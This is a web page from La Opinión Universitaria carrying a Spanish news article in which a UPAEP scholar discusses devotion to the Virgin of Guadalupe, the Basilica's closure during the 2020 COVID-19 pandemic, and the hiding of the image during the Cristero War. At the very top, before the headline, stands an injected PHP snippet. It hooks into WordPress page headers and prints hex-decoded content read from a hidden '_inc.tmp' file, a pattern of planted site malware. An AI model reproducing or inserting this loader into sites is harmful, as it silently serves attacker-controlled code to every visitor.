if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Virgen de Guadalupe siempre presente en los momentos difíciles de México – La Opinión Universitaria La Opinión Universitaria
Menu

Virgen de Guadalupe siempre presente en los momentos difíciles de México

 

La Virgen de Guadalupe siempre ha estado presente en la historia de México y más en los tiempos difíciles como es el caso de las pandemias que se han registrado siglos atrás.

Aun con todos los avances científicos y tecnológicos con que cuenta la humanidad en el campo de la medicina, en el desarrollo de antibióticos y demás medicamentos para el cuidado de la salud, el mundo se encuentra en “jaque”, ante la pandemia del COVID-19, manifestó Gerardo Valle Flores, coordinador del Centro de Estudios Guadalupanos de la UPAEP.

Expresó que el cierre de la Basílica de Guadalupe de la Ciudad de México durante los días 10, 11 y 12 de diciembre del presente año, ha causado mucho dolor e incertidumbre entre los mexicanos. Pero la devoción popular ha hecho que se supla con muchas otras cosas y acciones que permitan a las familias a permanecer en casa y seguir con el distanciamiento social y festejar a la Virgen Morena.

Valle Flores dijo que en estos momentos de confinamiento social, “las personas que tengan una manda, pueden solventar de diferentes maneras, ayudando a las personas que se encuentran en una situación de vulnerabilidad, a personas que estén enfermas o que hayan perdido su trabajo a causa de la pandemia del COVID-19, pueden contribuir con algunos víveres o con una ayuda económica, es decir, se pueden solidarizar con ellas y cumplir con la manda, sin tener que desplazarse a la Ciudad de México a la Basílica de Guadalupe o salir de sus hogares”.

Advirtió que con la actual pandemia del COVID-19, la gente tiene una gran incertidumbre porque no sabe cuánto tiempo va a durar, por lo que recomendó que la gente debe estar preparada para lo que venga y el tiempo que dure esta enfermedad y, sobre todo, “que las personas tomen cartas en el asunto, poner de su parte para cuidarse y evitar más daños de los que la enfermedad ha causado. Aquí la gente debe tener como primera prioridad la salud, porque de esta forma nos podremos liberar más pronto de esta pandemia, cuidándonos todos”.

Hoy estamos viviendo un acontecimiento histórico en el 2020, porque nunca se ha cerrado la Basílica de Guadalupe “en otros momentos se ha ocultado la Virgen de Guadalupe, como es el caso de la guerra cristera, con el cierre de todos los templos excepto la Basílica de Guadalupe. Pero las autoridades de esta Basílica, temerosas porque ya se había registrado un atentado contra la Virgen en 1921, hacen una copia de la Virgen de Guadalupe y es colocada en el lugar en donde siempre ha permanecido y la imagen original es guardada en secreto durante los tres años que dura la guerra cristera”, reiteró el académico.

 

  • Tweets recientes